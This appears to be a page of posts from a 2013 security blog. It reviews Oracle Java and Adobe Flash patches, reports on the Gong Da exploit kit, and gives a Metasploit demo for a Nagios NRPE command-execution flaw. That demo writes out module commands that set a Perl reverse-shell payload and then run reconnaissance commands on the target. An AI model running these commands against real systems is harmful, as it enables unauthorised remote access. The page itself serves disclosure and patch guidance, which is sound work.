Oracle Java Critical Patch Update April 2013 Review

16/04/2013Vulnerability ManagementCVE-2013-0401, CVE-2013-0402, CVE-2013-1488, CVE-2013-1491, CVE-2013-1518, CVE-2013-1537, CVE-2013-1540, CVE-2013-1557, CVE-2013-1558, CVE-2013-1561, CVE-2013-1563, CVE-2013-1564, CVE-2013-1569, CVE-2013-2383, CVE-2013-2384, CVE-2013-2394, CVE-2013-2414, CVE-2013-2415, CVE-2013-2416, CVE-2013-2417, CVE-2013-2418, CVE-2013-2419, CVE-2013-2420, CVE-2013-2421, CVE-2013-2422, CVE-2013-2423, CVE-2013-2424, CVE-2013-2425, CVE-2013-2426, CVE-2013-2427, CVE-2013-2428, CVE-2013-2429, CVE-2013-2430, CVE-2013-2431, CVE-2013-2432, CVE-2013-2433, CVE-2013-2434, CVE-2013-2435, CVE-2013-2436, CVE-2013-2438, CVE-2013-2439, CVE-2013-2440, Java, Java 7 Update 21, Java SE 6, Java SE 7, Oracle, Oracle Java Critical Patch Update, Oracle Java Critical Patch Update April 2013wow

Oracle has provide his Java Critical Patch Update (CPU) for April 2013 who has been released on Tuesday, April 16. On the 42 security vulnerabilities fixed in this CPU, 39 of them may be remotely exploitable. The highest CVSS Base Score for vulnerabilities in this CPU is 10.0.

This update fix the vulnerabilities exploited by James Forshaw (tyranid), Joshua J. Drake and VUPEN Security during Pwn20wn 2013. But this update is also fixing vulnerabilities reported by Adam Gowdiak of Security Explorations and other security researchers.

As you may know Oracle is using CVSS 2.0 (Common Vulnerability Scoring System) in order to score the reported vulnerabilities. But as you also may know security researchers disagree with the usage of CVSS by Oracle. Oracle play with CVSS score by creating a “Partial+” impact rating how don’t exist in CVSS 2.0, and by interpreting the “Complete” rating in a different way than defined in CVSS 2.0.

Affected products are:

JDK and JRE 7 Update 17 and earlier
JDK and JRE 6 Update 43 and earlier
JDK and JRE 5.0 Update 41 and earlier
JavaFX 2.2.7 and earlier

Proposed updates are:

JDK and JRE 7 Update 21
JDK and JRE 6 Update 45
JDK and JRE 5.0 Update 43
JavaFX 2.2.21

19 (45,24%) of the vulnerabilities have a CVSS base score of 10.0, 28 (66,67%) of the vulnerabilities have a high CVSS base score (CVSS => 7.0), 13 (30,95%) of the vulnerabilities have a medium CVSS base score (CVSS >= 4.0 < 7.0) and 1 (2,38%) of the vulnerabilities has a low CVSS base score (CVSS < 4.0). Also 25 (59,52%) of the vulnerabilities affects Java SE 6 and 42 (100%) of the vulnerabilities are affecting Java SE 7.

Also some modifications have been done in the Security Levels provided by Oracle. Previously five levels were existing (Very-High, High, Medium, Low and Custom), in the new provided version only three levels are still existing (Very-High, High and Medium).

But, there is always a but with Oracle, they don’t seem to have enable, by default, the check for revocation using Certificate Revocation Lists (CRLs) despite that some bad guys are using valid stollen and revoked certificates to sign malware’s.

So we advise you to update asap, enable the CRL check, if you still have Oracle Java plug-in installed !

Gong Da Exploit Kit Add Java CVE-2013-1493 & IE CVE-2012-4792 & IE CVE-2012-4969 Support

15/04/2013VariousAdobe, CVE-2011-3544, CVE-2012-0507, CVE-2012-1723, CVE-2012-1889, CVE-2012-4681, CVE-2012-4792, CVE-2012-4969, CVE-2012-5076, CVE-2013-0422, CVE-2013-0634, CVE-2013-1493, Flash, Gondad, Gong Da, Java, Microsoft, Oraclewow

Like other Exploit Kits, Gong Da has add support for Oracle Java CVE-2013-1493 vulnerability, fixed in Oracle Java 6 Update 17, has also add support for Microsoft Internet Explorer CVE-2012-4969 and CVE-2012-4792 vulnerabilities, fixed in an emergency patch in September 2012 and January 2013.

Here is the new code for CVE-2013-1493.

And here the new code for CVE-2012-4792 (aka 4792.html) and CVE-2012-4969 (aka payload.html).

Also a new variant of CVE-2012-1889 (xml.html) has been introduced, reducing the detection rate by anti-viruses.

As always this new version of Gong Da Exploit Kit has been discovered on a Korean web site.

Gong Da Pack has involve to the following diagram.

Here under some information s regarding the different files:

HcIa2.jar (aka CVE-2011-3544): 11/46 on VirusTotal.com
bzExj6.jar (aka CVE-2012-0507): 14/45 on VirusTotal.com
BnkLbvY3.jar (aka CVE-2012-1723): 19/46 on VirusTotal.com
iCNpns4.jar (aka CVE-2012-4681): 28/46 on VirusTotal.com
JdtDFRW1.jar (aka CVE-2012-5076): 16/46 on VirusTotal.com
TolxrJG6.jar (aka CVE-2013-0422): 19/46 on VirusTotal.com
FQxzUjYP.jar (aka CVE-2013-1493): 16/46 on VirusTotal.com
GwDFO7.swf (aka CVE-2013-0634): 10/46 on VirusTotal.com
xmlcoreOld.html (aka CVE-2012-1889): 18/46 on VirusTotal.com
xml.html (aka CVE-2012-1889): 3/35 on VirusTotal.com
xmlcoreNew.html (aka CVE-2012-1889): 10/45 on VirusTotal.com
4792.html (aka CVE-2012-4792): 1/46 on VirusTotal.com
xyaKEg.html and payload.html (aka CVE-2012-4969): 5/46 on VirusTotal.com

Normally Gong Da was used against gamers, but this time the loaded malware seem to be different (analysis on ThreatExpert)

CVE-2013-1362 Nagios Remote Plugin Executor Arbitrary Command Execution Metasploit Demo

12/04/2013Exploits, MetasploitCVE-2013-1362, Nagios, NRPEwow

Timeline :

Vulnerability discovered and reported to vendor by Rudolph Pereira
Vulnerability patched by vendor the 2012-12-21
Vulnerability publicly disclosed by Rudolph Pereira the 2013-02-21
Metasploit PoC provided the 2013-03-19

PoC provided by :

Rudolph Pereira
jwpari

Reference(s) :

CVE-2013-1362
OSVDB-90582
BID-58142

Affected version(s) :

Nagios Remote Plugin Executor (NRPE) prior to 2.14

Tested on Ubuntu 12.10 x86 with :

Nagios Remote Plugin Executor (NRPE) 2.13

Description :

The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.

Commands :

use exploit/linux/misc/nagios_nrpe_arguments
set RHOST 192.168.178.54
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.36
exploit

id
uname -a
ifconfig

APSB13-11 – Adobe Flash April 2013 Security Bulletin Review

09/04/2013Vulnerability ManagementAdobe, APSB13-11, CVE-2013-1378, CVE-2013-1379, CVE-2013-1380, CVE-2013-2555, Flashwow

Adobe has release, the 9 April 2013, during his April Patch Tuesday, one Adobe Flash security bulletin dealing with four vulnerabilities. This security bulletin has a Critical severity rating.

APSB13-11 – Security updates available for Adobe Flash Player

APSB13-11 is concerning :

Adobe Flash Player 11.6.602.180 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.275 and earlier versions for Linux
Adobe Flash Player 11.1.115.48 and earlier versions for Android 4.x
Adobe Flash Player 11.1.111.44 and earlier versions for Android 3.x and 2.x
Adobe AIR 3.6.0.6090 and earlier versions for Windows, Macintosh and Android
Adobe AIR 3.6.0.6090 SDK & Compiler and earlier version

CVE-2013-1378 (7.5 CVSS base score), CVE-2013-1379 (7.5 CVSS base score) and CVE-2013-1380 (7.5 CVSS base score) have been discovered and privately reported by Mateusz Jurczyk, Gynvael Coldwind, and Fermin Serna of the Google Security Team. CVE-2013-2555 (10.0 CVSS base score) has been discovered and privately reported by a VUPEN Security reported through TippingPoint’s Zero Day Initiative.

Eric Romang Blog

aka wow on ZATAZ.com